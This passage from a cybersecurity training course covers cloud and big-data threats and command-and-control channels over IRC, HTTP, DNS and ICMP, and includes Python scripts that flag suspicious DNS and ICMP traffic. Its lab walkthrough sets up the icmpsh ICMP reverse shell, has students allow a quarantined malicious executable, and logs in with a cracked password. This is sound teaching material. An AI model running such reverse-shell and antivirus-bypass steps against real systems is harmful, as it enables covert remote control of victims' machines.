b) In the Search box in the upper-right corner of the page, type iphone and press Enter.
c) Scroll down past the ads and select the Apple Iphone Os : CVE security vulnerabilities link.
d) Select the CVSS Scores Report link at the top of the report.
By default, the scores are shown for the past total year.
e) Examine how these vulnerabilities are scored.
f) Open a new tab to www.cvedetails.com, and in the Search box, enter android
g) Select the Google Android : CVE security vulnerabilities link.
h) Select the CVSS Scores Report link at the top of the report.

2. Which platform has more known weaknesses?
A: Answers may vary depending on when you check these reports, but when this course was written, Android had more than twice as many vulnerabilities as iOS. However, iOS vulnerabilities were more likely to be in the critical score range (9–10). The weighted average CVSS score for iPhone vulnerabilities was also higher than Android. In past years, the report showed the opposite of these conclusions, which demonstrates that mobile vulnerabilities fluctuate over time.

3. Identify security apps available for Android.
a) In your web browser, navigate to https://play.google.com/store.
b) In the Search box, type security apps and press Enter.

Instructor note: Ensure students are selecting Apps from the content section and not the navigation menu on the left side of the page.


c) Select Apps to expand the displayed security apps.

Instructor note: Consider pointing out that iOS doesn't offer many security apps, at least not to the extent of the Google Play store.

4. Why does the Google Play store have so many security apps?
A: Because it is an open platform, many vendors can sell their apps there. Android's openness may also be more attractive to attackers.

5. Identify iOS security concerns.
a) In the browser, navigate to https://support.apple.com/guide/security.
b) In the Search this guide search box, enter iOS
c) Follow some of the links in the results and look them over briefly.
d) Verify that iOS has controls for code signing, app sandboxing, connection security, boot protection, and more.

Instructor note: An Apple device is required to access the App Store.

6. What are your recommendations for handling BYOD in Develetech?
A: Answers will vary widely, and may reflect an individual's preconceptions. Android has a wide variety of security apps designed by trusted vendors, but it tends to be a more widely targeted system. Apple devices may have fewer vulnerabilities, but what vulnerabilities they do have may be more critical. In today's world, it's not always feasible to impose hard restrictions on the types of devices that personnel can use, depending on the industry and corporate culture. So, in many cases, the best approach is to accept the risk or try to mitigate the risk using indirect methods like training personnel on acceptable device usage, implementing a robust access control and privilege management program across the organization, and so on.

7. Close the web browser.



TOPIC G
Assess the Impact of Threats to Cloud Security
As more organizations are pushing their operations to the cloud, it's vital you understand how threats could compromise those operations.

Cloud Infrastructure Challenges
The main idea behind cloud computing is that you can access and manage your data and applications from any computer, anywhere in the world, while the storage method and location are hidden or abstracted through virtualization. Because of this, customers of cloud services are experiencing a decrease in the amount of control they have over their systems and data. Likewise, threats that would target on-site hosting are now adjusting to target cloud providers.
For example, a single cloud provider may offer services to multiple customers. This gives attackers cause to target the provider, as even a minor breach can net the attacker something of value. In a traditional infrastructure, an attacker may find intrusions to be much more difficult, as the network can be isolated from the outside world; however, in a cloud environment, the attacker may simply need to have an Internet connection and not much else to cause a breach. A lack of oversight in the security procedures of cloud providers can dramatically increase the risk an organization takes.
Cloud infrastructures are also unique in that they require specialized application programming interfaces (APIs) for third parties to interface with the cloud. These APIs can cover everything from authentication to encryption, and if they aren't secure, attackers can easily take advantage of the APIs to compromise the link between the customer and provider.
The cloud infrastructure is a boon to attackers. The elastic computing power that can be borrowed through the cloud from services such as those provided by Amazon, Microsoft, and Google enable an attacker to quickly scale their computing capabilities (to run password cracking algorithms or stage DDoS attacks, for example) and to borrow access to resources in a way that can make their actions hard to trace. Forensic analysis can be extremely difficult in the cloud environment, since storage and computing resources are typically virtualized. It may be difficult to pinpoint a single server or router as the failure point. The data needed to reconstruct the incident may be scattered among many devices within multiple data centers throughout the world.
Furthermore, the attacker might cobble together an attack platform from multiple vendors—such as using cloud computing capabilities from Amazon, cloud storage from Microsoft®, and routing communications through Google's Gmail™ service. An attacker might run different components of their attack apparatus on different projects or different platforms to make it more difficult for their activities to be detected or tracked.

Threats to Virtualized Environments
The following table describes some of the threats to virtualized environments often used in cloud infrastructures.

Instructor note: Example CVE ID: CVE-2014-8891.

Virtual Threat | Description

VM escape: In a virtual machine (VM) escape, an attacker executes code in a VM that enables an application running on the VM to escape and interact directly with the hypervisor. VM escape could give the attacker access to the underlying host operating systems and thereby allow access to all other VMs running on that host machine. This is one of the most serious threats to virtual security.


Privilege elevation: In a virtualized environment, an attacker with elevated privileges could access
the host machine and do anything an administrator could do to both the host machine and the VMs
running on that host.

Live VM migration exploitation: In some situations, you may need to move a VM from one physical host
to another with no impact to the VM's availability. This is called live VM migration. Live migration
can be exploited by attackers. Hypervisors without proper authentication and integrity protocols may
enable an attacker to migrate VMs to their own machine, or migrate the VMs to a victim machine,
overloading it with a DoS attack.

Data remnants: Data remnants (also referred to as data remanence) are leftover information on a
storage medium even after basic attempts have been made to remove that data. Because VMs are an
abstraction of a physical environment and not the real thing, it is difficult to ensure that data you
delete on the VM will truly sanitize that data from its physical source. This is similar to the idea
that simply emptying an operating system's trash bin will not completely erase the data from the
storage drive; an attacker may still be able to retrieve the remaining bits before they are
overwritten. For VMs, this is primarily a concern during the deprovisioning process, as every bit of
data involved in the virtual instance may not be completely gone from physical storage.
Threats to Big Data

Big data refers to data collections that are so large and complex they are difficult for traditional
database tools to manage. Businesses are often prompted to restructure their existing architecture to
keep up with the demands of big data. This paradigm presents a challenge to security professionals
who must adapt to the massive scope of big data.

The following table lists common threats to big data.

Breach of privacy: Big data is a solution often used to store great volumes of personal information.
Such a large store of data may make it easier for an attacker to steal sensitive personal information
in one comprehensive attack.

Privilege escalation: Because big data can represent wide swaths of information, some users may be
able to view data they are not authorized to view. This is especially true if systems are not in
place to restrict how users can view and edit database entries. Multiple users with unrestricted
visibility to data can threaten its confidentiality.

Repudiation: The size of big data may make event monitoring difficult or infeasible. Without proper
controls for non-repudiation, an attacker may be able to change data and then plausibly deny having
done so.

Forensic complications: Accurately securing, collecting, and evaluating big data sets is especially
difficult because big data implementations often lack a consistent structure and have a variety of
different sources.

Cloud Infrastructure Hacking Tools

Many of the tools you've been introduced to in this lesson can be used to exploit the nature of cloud
infrastructure. Everything from DoS utilities to malware distribution tools can both attack and
benefit from the cloud. Attacks directed at the cloud are often tailored for distributed virtual
environments. For example, tools that can install evasive and armored malware will likely fare better
than typical malware, as cloud services usually offer some sort of malware detection ability in their
virtual environments. Another example is exploitation tools that target web services and applications
running in the cloud. Organizations often encourage their customers to interact with these services
and applications more than they would off the cloud, which makes attacks like SQL injection more
attractive to an attacker. These organizations may also be lulled into a false sense of security in the
cloud, and fail to implement the proper controls against such injection attacks.

Another dimension of cloud attacks involves attackers actually using the cloud to exploit other
environments. By its very nature, the cloud is a highly distributed, instantly scalable, and powerful
set of resources. This is especially true of major services like Amazon EC2™, Google Compute
Engine™, and Microsoft Azure®, as their hosting abilities are massive. So, an attacker who can
direct this power for their own malicious purposes will find their exploits even more effective than if
they relied on traditional means. Instead of slowly and unreliably infecting individual computers
across the world in an effort to create a botnet for DDoSing, an attacker can leverage the computing
power of the cloud to execute this DDoS more efficiently.

For example, consider an attacker running an automated script that signs up thousands of accounts
for a free cloud service provider in a very short time. Some providers will detect this behavior, but
other, smaller providers may be poorly equipped to do so. The attacker then creates a control
program that is able to direct every single account and its resources toward a single goal:
overwhelming a target with bogus traffic. Instead of coordinating a botnet made of disparate
resources stretched thin, the attacker has used the power of a single cloud service to crash their
target. But a DDoS is just one of the possible attacks that can be launched from an unwitting cloud
provider; malware distribution, password cracking, and other types of exploits benefit greatly from
virtually unlimited computing power.

Figure 4-17: An attacker exploiting free cloud services to DDoS a target server.


ACTIVITY 4-7
Assessing the Impact of Threats to Cloud Infrastructures

Scenario

As Develetech investigates replacing several legacy systems within the company, it is considering
migrating to various cloud services and applications. The cybersecurity team is meeting to identify
various types of new threats and challenges the company might face as they migrate to the cloud.
While the team is aware that some risks can be addressed through a service-level agreement (SLA)
with cloud vendors, ultimately the risks are Develetech's, so the team is eager to anticipate any
challenges that a cloud migration will bring.

1. By migrating from on-premises infrastructure to cloud services, what new security risks or
challenges might Develetech be exposed to?
A: Examples include: hijacking of the entire cloud account or service (for example, an attacker cracks
the password for the management console); insecure public APIs through which an attacker can
gain access to the company's private resources; a malicious insider at the cloud services firm
looking to harm the company or the cloud services firm; as well as the general risks associated
with moving to any web-based service (DoS, password cracking, man-in-the-middle, etc.). One of
the fundamental principles of most cloud services is leveraging economies of scale by sharing a
huge pool of storage and computing resources among many customers. Although there are many
benefits to this approach, it also brings a potential weakness. Any vulnerability in the cloud service
that enables a malicious customer of the cloud service to escape their own sandbox may enable
them to access information resources that belong to other companies. While the likelihood of this
risk might be low, its impact can be quite high, including the loss of valuable or sensitive data,
service interruption for clients and the cloud provider, possible loss of reputation, legal and civil
penalties, and compliance violations.

2. What new challenges might Develetech experience in regard to performing forensics?
A: With local infrastructure, forensic investigations can often be accomplished at the physical level
with an analysis of content in specific storage media. With the cloud, forensics becomes much
more complex due to the virtual nature of storage and computing resources. For example, some
cloud vendors may distribute a single user's storage across multiple drives, multiple data centers,
or even multiple geographic regions. Establishing a chain of custody becomes difficult or
impossible. As it considers each cloud service it might adopt, Develetech should model various
forensic scenarios to determine if it will be possible to obtain evidence it needs when it needs it. In
some cases, it may be necessary to build forensic capabilities into the design when customizing
cloud services or integrating them into your own infrastructure.

3. In what ways can attackers use cloud services as a hacking tool?
A: The benefits of cloud services apply to attackers as well as legitimate users. For example,
attackers can use the big data and scalable computing tools provided by cloud services to perform
resource-intensive operations such as password cracking or DDoS attacks. Hosting services can
be used as collection points for data collected by attackers or as distribution points for malware.


Summary
In this lesson, you identified various types of threats to your computing and network environments,
such as system hacking attacks, DoS incidents, and impersonation attacks. In addition, you assessed
the impact of threats to your mobile and cloud infrastructures. After identifying the wide variety of
threats, you can then evaluate various strategies and tactics for dealing with such threats.

Encourage students to use the social networking tools provided on the CHOICE Course screen to
follow up with their peers after the course is completed for further discussion and resources to
support continued learning.

In your experience, what types of threats has your organization or an organization you're familiar
with encountered? Were there strategies in place to deal with them?
A: Answers will vary. Most organizations have faced a wide variety of threats to their computing and
network systems. Recent news stories are filled with information security threats, such as identity
theft, malware, and social engineering attacks targeted toward large organizations. Quite often,
strategies for dealing with the threats are developed after the threat has been revealed.

Has your organization or an organization you're familiar with ever been the target of a DoS
incident? What was the impact if it was preventable?
A: Answers will vary. Although a DoS incident isn't necessarily designed to steal information, it does
cause harm to an organization by locking up systems, consuming bandwidth and system resources,
and flooding mail and other services on the network. Additionally, a DoS can be used to send data
designed to exploit known flaws in an application, thus opening the door for more malicious incidents.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.

5 Analyzing Post-Attack Techniques

Lesson Time: 3 hours

Lesson Introduction

After reconnaissance and attack, the last phase of the threat process is post-attack. In many
cases, an attacker won't just withdraw once their attack is done; on the contrary, they'll want
to stay in control of the systems they've compromised, continue to evade any
countermeasures, and cover their tracks to avoid being identified. All of this means that, if
you prematurely terminate your threat assessment efforts, they'll have gone to waste.
Instead, you need to hone your focus on what an attacker does after an attack that can inflict
long-lasting harm on your organization.

Lesson Objectives

In this lesson, you will:

• Assess command and control techniques.
• Assess persistence techniques.
• Assess lateral movement and pivoting techniques.
• Assess data exfiltration techniques.
• Assess anti-forensics techniques.

TOPIC A
Assess Command and Control Techniques
In this topic, you'll assess how attackers can continue to serve malicious software to victims through
a coordinated and highly connected network of servers and botnets.

Command and Control

In cybersecurity, command and control (C&C) refers to an infrastructure of computers with
which attackers direct, distribute, and control malware. This is made possible primarily through
coordinated botnets—after compromising systems and turning them into zombies, the attacker adds
these systems to an ever-growing pool of resources. The attacker then issues commands to the
resources in this pool. A command can be a simple ping or heartbeat to verify that the bot is still
alive in the botnet—a process called beaconing—or the issued command can be more malicious
(for example, attempting to infect any computers the bot is connected to in a network).

C&C servers are difficult to pin down because they frequently change Domain Name System (DNS)
names. Dynamic DNS registration helps attackers avoid detection, as does using many hosts in
issuing commands to the zombie computers. This is particularly problematic in organizations that
have hundreds or even thousands of devices connected on a network. Each one is a potential attack
surface for a C&C operation to start with, and then the attack can spread exponentially throughout
the organization. Most successful C&C operations manage to snare bots in a private network
without the organization even knowing.

Throughout this lesson, consider pointing to specific Common Vulnerabilities and Exposures (CVE),
Common Weakness Enumeration (CWE™), and Common Attack Pattern Enumeration and
Classification (CAPEC™) entries that demonstrate the real-world impact of these attacks and their
related vulnerabilities. Some examples are provided for you in content delivery tips.

Figure 5-1: An attacker issuing commands to zombies in a private network.

In issuing commands, the C&C server must find a channel to communicate over. The channels that
attackers use can vary, and each may have their own strengths and weaknesses. Examples of
channels include:
• Internet Relay Chat (IRC)
• HTTP/S
• DNS
• Internet Control Message Protocol (ICMP)
• Additional channels

Lesson 5: Analyzing Post-Attack Techniques | Topic A



Internet Relay Chat (IRC)

Internet Relay Chat (IRC) is a group communication protocol. IRC clients send messages to IRC
servers, which then display these messages to every other client connected to a server. Although its
primary use is group chatting, IRC also supports private messages and file sharing between clients.
IRC networks are divided into discrete channels, which are the individual forums used by clients to
chat.

IRC has been a popular channel for C&C communication for some time. This is due in large part to
the ease with which an attacker can set up an IRC server and begin sending interactive control
directives to individual bots connected to the IRC server. Other channels will generally require
additional development and scaling to provide full control to the C&C server, but with IRC, it takes
very little effort. This is because IRC infrastructure supports a great deal of flexibility in the types of
commands that can be sent to a server by a client. For example, the C&C server could issue a
command to its zombie IRC clients that forces them to download new malicious software. The
malware update propagates through the IRC clients quickly and easily.

Despite its popularity in years past, use of IRC as a C&C channel is on the decline, as is IRC use in
general. IRC traffic is relatively easy for administrators to detect, and many organizations have no
use for this protocol, so they simply block all such communications. This has motivated C&C
operators to turn elsewhere for their communication needs, but some still maintain a significant and
harmful presence in IRC.

HTTP/S

Unlike IRC, communication over HTTP and HTTPS is still a necessity in almost every
organizational network, and blocking these protocols entirely is simply not feasible. Additionally, it's
difficult to separate malicious traffic from legitimate traffic, so attackers are finding these web-based
protocols more viable channels for their C&C communications.

When used in C&C, HTTP/S servers are not as flexible as IRC. Out-of-the-box web servers don't
typically afford the C&C server much interactive control with its messages, so the server may need
to upload text files to multiple web servers as a way to communicate with its bots. The bot connects
to one or more of these web servers to receive its orders from the text file. The text file may, as
before, instruct the bot to update its malicious software. The process is less streamlined than with
IRC, but attackers can still find success. If the attacker takes the time to program more interactivity
into the web server backend, they may be able to match IRC's full control capabilities.

Although administrators can take steps to mitigate HTTP/S C&C operations by blocking known
malicious domains, as explained before, attackers are able to change domains more quickly than
many administrators can keep up with.

DNS

Another channel for C&C communication on the rise is the DNS protocol. Because DNS traffic is
not inspected or filtered in most private networks, attackers see an opportunity for their control
messages to evade detection. Using DNS, attackers send their commands in either request or
response queries to bots that share usage of the same name servers or delegation path. This typically
makes the queries longer and more complicated than average, because the C&C directive needs to
fit with the DNS format. While this can be challenging, and certainly doesn't offer the same
flexibility as IRC, attackers are able to exploit organizations that don't continuously monitor their
name servers.

To evade detection when DNS servers are monitored, attackers break their control messages into
several different query chunks so as not to trip sensors that only look at individual transmissions.
Another sign of a C&C operation through DNS is when the same query gets repeated several times;
this indicates that the bot is checking into the control server for more orders.


DNS as a C&C channel is also effective because the bot doesn't even need to have a direct
connection to outside the network. All it needs to do is connect to a local DNS server that executes
lookups on authoritative servers outside the organization (like those on the Internet), and it can still
receive a response with a control message.
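As an added example (it is not part of the course materials), the following Python script applies the three DNS indicators described above to a constructed resolver query log: queries made unusually long by a directive squeezed into the name, several distinct names under one domain from a single client (a message broken into query chunks), and the same query repeated (a bot checking in). The log format, the thresholds, and the last-two-labels rule for the registrable domain are assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample of resolver query-log lines (time, client, query name, type).
# Not real traffic: the long hex labels stand in for chunks of an encoded message.
SAMPLE_DNS_LOG = """\
10:00:01 10.39.5.20 www.example.com A
10:00:02 10.39.5.20 mail.example.com A
10:00:05 10.39.5.31 4f3a1c9e7b2d8a6f0e5c3b1a9d7f2e4c1b0a9f8e.updates.example.net TXT
10:00:06 10.39.5.31 4f3a1c9e7b2d8a6f0e5c3b1a9d7f2e4c1b0a9f8d.updates.example.net TXT
10:00:07 10.39.5.31 4f3a1c9e7b2d8a6f0e5c3b1a9d7f2e4c1b0a9f8c.updates.example.net TXT
10:00:08 10.39.5.31 4f3a1c9e7b2d8a6f0e5c3b1a9d7f2e4c1b0a9f8b.updates.example.net TXT
10:01:00 10.39.5.42 checkin.updates.example.net TXT
10:02:00 10.39.5.42 checkin.updates.example.net TXT
10:03:00 10.39.5.42 checkin.updates.example.net TXT
10:04:00 10.39.5.42 checkin.updates.example.net TXT
10:04:10 10.39.5.20 www.example.com A
"""


def shannon_entropy(text):
    """Bits per character; encoded data scores higher than a human-chosen hostname."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_dns_log(text):
    """Parse the assumed 'time client qname qtype' format into dicts."""
    rows = []
    for line in text.strip().splitlines():
        ts, client, qname, qtype = line.split()
        rows.append({"ts": ts, "client": client,
                     "qname": qname.lower().rstrip("."), "qtype": qtype})
    return rows


def base_domain(qname):
    # Assumption: the registrable domain is the last two labels.
    # Production code should consult the public suffix list instead.
    return ".".join(qname.split(".")[-2:])


def analyze_dns_queries(rows, max_name_len=60, max_label_len=30,
                        chunk_threshold=3, repeat_threshold=3):
    """Return a list of findings, one dict per suspicious observation."""
    findings = []
    names_per_domain = defaultdict(set)   # (client, base domain) -> distinct names
    repeats = Counter()                   # (client, qname) -> how often it was asked

    for r in rows:
        qname, client = r["qname"], r["client"]
        longest = max(qname.split("."), key=len)
        # Indicator 1: a directive fitted into the DNS format makes the name oversized.
        if len(qname) > max_name_len or len(longest) > max_label_len:
            findings.append({"client": client, "qname": qname,
                             "reason": "oversized query",
                             "label_entropy": round(shannon_entropy(longest), 2)})
        names_per_domain[(client, base_domain(qname))].add(qname)
        repeats[(client, qname)] += 1

    # Indicator 2: one client asking for many distinct names under one domain
    # looks like a control message split into several query chunks.
    for (client, base), names in names_per_domain.items():
        if len(names) >= chunk_threshold:
            findings.append({"client": client, "qname": base,
                             "reason": "possible chunked message",
                             "unique_names": len(names)})

    # Indicator 3: the same query repeated is a bot checking in for orders.
    for (client, qname), count in repeats.items():
        if count >= repeat_threshold:
            findings.append({"client": client, "qname": qname,
                             "reason": "repeated check-in", "count": count})
    return findings


if __name__ == "__main__":
    for finding in analyze_dns_queries(parse_dns_log(SAMPLE_DNS_LOG)):
        print(finding)
```

The same three checks apply to response records, which the text notes can carry the directive in the other direction; only the parsed field changes.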

ICMP

Although not as common as other methods, C&C operations can use Internet Control Message
Protocol (ICMP) as their chosen communications channel. The bot can ping its C&C controller and
ask for orders, and the controller can respond with its commands. Each of these transmissions is
done in a single ICMP packet. Because ICMP packets are relatively small and used primarily to
check the status of other hosts on a network, the most obvious C&C message to use is a simple
check to see if the bot is still active.

Advanced messages like file transfers and remote shells are much more difficult to execute within
ICMP constraints, but may still be possible. This is not ideal for attackers who need a high degree of
reliability in their operations, but some may use ICMP simply because it's not commonly thought of
as a vector for advanced C&C operations. However, there are plenty of reasons why an attacker may
not bother with ICMP. First, many organizations simply block inbound traffic on this protocol
because of its popular use in distributed denial of service (DDoS) attacks. Second, administrators
may set a baseline for ICMP packet sizes, and if they notice a packet size above or below the
baseline, it may trigger an alert. And third, ICMP packets are not encrypted, and monitoring services
can easily inspect them for abnormal contents.
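As an added example that is neither the course's own code nor part of the icmpsh tool, this Python script parses raw IPv4/ICMP echo requests (constructed inline) and applies the two defensive checks just described: a packet-size baseline and an inspection of the unencrypted payload for text-like contents. The baseline lengths (60 bytes for a default Windows ping, 84 for a default Linux ping) and the known ping payload patterns are assumptions; the icmp.type==8 && ip.len > 60 filter from Activity 5-1 is included to show why a size filter on its own also matches ordinary Linux pings.

```python
import socket
import struct

# Assumed default echo-request payloads: Windows ping sends 32 alphabet bytes,
# Linux ping sends an 8-byte timestamp followed by the bytes 0x10, 0x11, ...
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
LINUX_PING_PAYLOAD = b"\x00" * 8 + bytes(range(0x10, 0x40))
KNOWN_PING_PAYLOADS = {WINDOWS_PING_PAYLOAD, LINUX_PING_PAYLOAD[8:]}
# Assumed size baseline: IP total length of a default ping from each platform
# (20-byte IP header + 8-byte ICMP header + 32 or 56 bytes of payload).
BASELINE_IP_LENGTHS = frozenset({60, 84})


def inet_checksum(data):
    """RFC 1071 one's-complement checksum shared by IP and ICMP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src, dst, payload, ident=1, seq=1):
    """Construct a raw IPv4 packet carrying an ICMP echo request (type 8)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = struct.pack("!BBHHH", 8, 0, inet_checksum(icmp), ident, seq) + payload
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x1234, 0, 64,
                         1, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return ip_hdr + icmp


def parse_packet(pkt):
    """Return the fields an inspector needs, or None when the packet is not ICMP."""
    vihl, _tos, total_len, _id, _frag, _ttl, proto, _hcs, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if proto != 1:
        return None
    icmp = pkt[(vihl & 0x0F) * 4:total_len]
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "ip_len": total_len, "icmp_type": icmp[0], "payload": icmp[8:],
            "checksum_ok": inet_checksum(icmp) == 0}


def looks_like_text(payload, threshold=0.9):
    """True when nearly every byte is printable ASCII (tab, CR and LF allowed)."""
    if not payload:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    return printable / len(payload) >= threshold


def matches_activity_filter(info):
    """The Wireshark filter used in Activity 5-1: icmp.type==8 && ip.len > 60."""
    return info["icmp_type"] == 8 and info["ip_len"] > 60


def assess_echo_request(info):
    """List the reasons an echo request deserves a look; empty means unremarkable."""
    reasons = []
    if info["icmp_type"] != 8:
        return reasons
    if info["ip_len"] not in BASELINE_IP_LENGTHS:
        reasons.append("ip.len %d outside ping baseline" % info["ip_len"])
    payload = info["payload"]
    known = payload in KNOWN_PING_PAYLOADS or payload[8:] in KNOWN_PING_PAYLOADS
    if not known and looks_like_text(payload):
        reasons.append("text-like payload")
    return reasons


# Constructed traffic: a Windows ping, a Linux ping, and an echo request whose
# payload carries the text of a directory listing instead of ping filler.
SAMPLE_PACKETS = [
    build_echo_request("10.39.5.10", "10.39.5.1", WINDOWS_PING_PAYLOAD),
    build_echo_request("10.39.5.11", "10.39.5.1", LINUX_PING_PAYLOAD),
    build_echo_request("10.39.5.12", "10.39.5.2",
                       b" Volume in drive C has no label.\r\n Directory of C:\\Temp\r\n"),
]


def inspect(packets):
    """Parse each packet and return (src, ip_len, reasons) for the flagged ones."""
    flagged = []
    for pkt in packets:
        info = parse_packet(pkt)
        if info is not None:
            reasons = assess_echo_request(info)
            if reasons:
                flagged.append((info["src"], info["ip_len"], reasons))
    return flagged
```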

Additional Channels

The following table lists some additional and custom channels that C&C operations can use.

Social media websites: Facebook, Twitter, and LinkedIn have all been vectors for C&C operations.
Social media platforms like these are a way for the attacker to blend in with the crowd, issuing
commands through the platforms' messaging functionality or their account profiles. For example,
many businesses implicitly trust LinkedIn. An attacker could set up an account and issue commands
to bots through the account's profile, using fields like employment status, employment history,
status updates, and more. Similarly, there is evidence that a C&C operation used random Twitter
accounts to post seemingly random hashtags. These hashtags were actually encoded, and bots would
scour Twitter messages for these hashtags to receive their orders. Over the years, social media sites
have gotten better at shutting down C&C operations.

Media files: Media file formats like JPEG, MP3, and MPEG use metadata to describe images, audio,
and video. This is especially prevalent in digital cameras, which record characteristics like aperture
and shutter speed in metadata. An attacker could embed its control messages inside this metadata,
and then send the media file to its bots over any number of communication channels that support
media sharing. Because monitoring systems do not typically look at media metadata, the attacker
may be able to evade detection.


XML-based documents: Modern Microsoft® Office documents use an XML-based file format.
Examples include DOCX, XLSX, and PPTX. This format decreases the file size while enabling more
functionality. However, because XML-based documents are essentially compressed files, they can be
embedded with extraneous or malicious data. This data can hold the attacker's C&C message, and
like media metadata, most monitoring systems won't detect them during transmission.

Peer-to-peer (P2P) networks: Although most C&C networks have a centralized configuration, some
attackers have seen value in decentralizing to more effectively evade detection and shutdown. In most
cases, the C&C server is a single point of failure. Although this is mitigated somewhat by backups
and dynamic DNS registration, it still poses a challenge for attackers. Therefore, attackers use peers
in a P2P network to distribute controllers among many hosts. If one or a group of peers is taken
down, the botnet may still be able to function, and C&C operations continue unabated. The major
downside for an attacker is that P2P networks are hard to establish.

Cloud services: Cloud companies that provide a wide variety of services, especially infrastructure
and platform services, are also at risk of being C&C vectors. For example, attackers used the Google
App Engine™ platform to send C&C messages to bots through a custom application hosted by the
service. App Engine is attractive to attackers because it offers free, limited access to the service.
Instead of incurring the cost of setting up their own servers, attackers use a cloud company's reliable
and scalable infrastructure to support their C&C operations.


ACTIVITY 5-1
Assessing Command and Control Techniques

Data File

/home/kali/Desktop/icmpsh.zip
C:\CNX0013Data\Analyzing Post-Attack Techniques\icmpsh.zip

Before You Begin

You'll be using your Kali Linux™ virtual machine (VM) as a controller, and your Windows Server®
as a bot. The program you'll use to initiate these C&C communications is called icmpsh.

Scenario

You want to begin assessing how attackers may still compromise your machines even after the main
attack has concluded. In particular, attackers can turn your hosts into zombies they control, and use
them for a variety of malicious purposes. You're familiar with C&C over IRC, so you've taken
measures to block that protocol entirely. However, you want to see how a more common and
necessary channel can be used in C&C operations.

1. Extract the icmpsh tool.
a) Switch to your Kali Linux VM.
b) Right-click the icmpsh.zip file on the desktop and select Extract Here.

2. Start the icmpsh controller.
a) Open a terminal window.
b) Enter cd ~/Desktop/icmpsh-master to navigate to the extracted directory.
c) Enter sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
d) Verify that the terminal responds with net.ipv4.icmp_echo_ignore_all = 1
This command disables normal ICMP responses so the victim can more easily listen to commands
from the controller.
e) At the prompt, enter gcc icmpsh-m.c -o icmpsh-ctrl
This compiles the C source file into an executable.
f) Enter sudo ./icmpsh-ctrl
This starts the master system (controller) listening for the slave (bot) response.

3. Start your server listening as a bot.
a) Switch to your Windows Server and extract the icmpsh.zip file to C:\Temp.
b) Select the Windows Security pop-up that indicates that it found a malicious file.
c) In Windows Security, under the quarantined entry, select Severe, select Actions→Allow, then close
Windows Security.
d) Check C:\Temp\icmpsh-master and verify that icmpsh.exe is listed. If it isn't, extract the icmpsh.zip
file again.
e) Return to your Kali Linux VM and open a second terminal, keeping the icmpsh terminal running.
f) At the prompt, enter ssh Administrator@10.39.5.# where # corresponds to your server's IP
address.
g) Enter the password you cracked earlier (Pa22w0rd).
h) At the SSH prompt, navigate to the server's C:\Temp\icmpsh-master directory.
i) Enter icmpsh -t 10.39.5.# where # corresponds to your Kali Linux VM's IP address.
j) Switch back to your original terminal window and verify that you can see the C:\Temp\icmpsh-master
prompt.

4. Send commands from your controller to your bot and capture the traffic.
a) In Kali Linux, from the menu bar, select Applications→Sniffing & Spoofing→wireshark.
b) Start a capture on eth0.
c) Switch to the terminal with the icmpsh C:\Temp\icmpsh-master prompt and run some common
Windows® commands such as dir, ipconfig, and arp -a.
d) Return to Wireshark and stop the capture.
e) Add the following filter in Wireshark: icmp.type==8 && ip.len > 60
This filters the capture by ICMP echo requests with data payloads. These echo requests are coming
from your Windows Server.
f) Examine the captured packets and note the responses to your commands sent over ICMP.

Ask students if they believe this could be a viable way for a bot or other malware to communicate
and send data.

5. Why might this traffic bypass firewall and intrusion detection system/intrusion prevention system
(IDS/IPS) controls?
A: Since many networks do not block outbound ICMP traffic, this type of C&C communication may
successfully bypass such controls.

6. How might you stop this type of communication?
A: Answers will vary. Blocking outbound ICMP traffic is an option, but it limits your ability to diagnose
network problems through ping and traceroute. Stateful filtering of this traffic will not be
useful, as there is no state to filter. Application-layer firewalls also tend to ignore ICMP. However,
packet inspectors may be able to review ICMP traffic for unusual behavior, such as the messages'
length or contents. The fact that Windows Security identified the bot executable as malicious is
promising, but it won't necessarily detect every possible payload.


7. What other methods of command and control could an attacker use to evade your security?
A: Answers may vary, but should at least include mention of HTTP/S and DNS. These are very
difficult to detect and stop because they blend into normal traffic.

8. Perform cleanup tasks.
a) Close Wireshark without saving.
b) Press Ctrl+C on both terminals to stop icmpsh.
c) At any terminal, enter sudo sysctl -w net.ipv4.icmp_echo_ignore_all=0 to reset the
ICMP configuration.
d) Close both terminals.


TOPIC B
Assess Persistence Techniques
In this topic, you'll assess how attackers can maintain access once they've breached a system or
network.

Advanced Persistent Threat (APT)

An advanced persistent threat (APT) is a threat that continually exploits a target while remaining
undetected for a significant period of time. APTs typically target large organizations to covertly
compromise their business efforts. Financial institutions, companies in health care, and other
organizations that store massive quantities of personally identifiable information (PII) are the most
common victims of an APT. APTs have also targeted governments to carry out political objectives
or simply as a way to spy on another country. Most APTs are usually not individual attackers, but a
group of highly technical people that work toward a clearly defined goal.

The "advanced" part of an APT is an important identifier, as these types of threats are very rarely
executed by lone, unskilled attackers using pre-baked exploits. Instead, APTs spend considerable
effort in gathering intelligence on their target, and are able to craft highly specific custom exploits
that even cybersecurity professionals may have a difficult time detecting. Another characteristic of
the advanced nature of APTs is that they often combine many different attack elements into an
overall threat architecture.

There are several possible use cases for an APT, but since a large part of the attack is about stealth,
most APTs are interested in maintaining access to networks and systems. There are several
techniques that can grant attackers access for months or even years on end without being detected.
Because of this, APTs are some of the most insidious and harmful threats to an organization.

CrowdStrike (https://www.crowdstrike.com) and FireEye (https://www.fireeye.com/) are two online
services that compile information about known APT groups. Consider demonstrating them.

Rootkits

Rootkits, because they work at such a low level on a compromised host and are adept at concealing
malicious code, are a staple of APTs. The power of rootkits is they can alter an operating system's
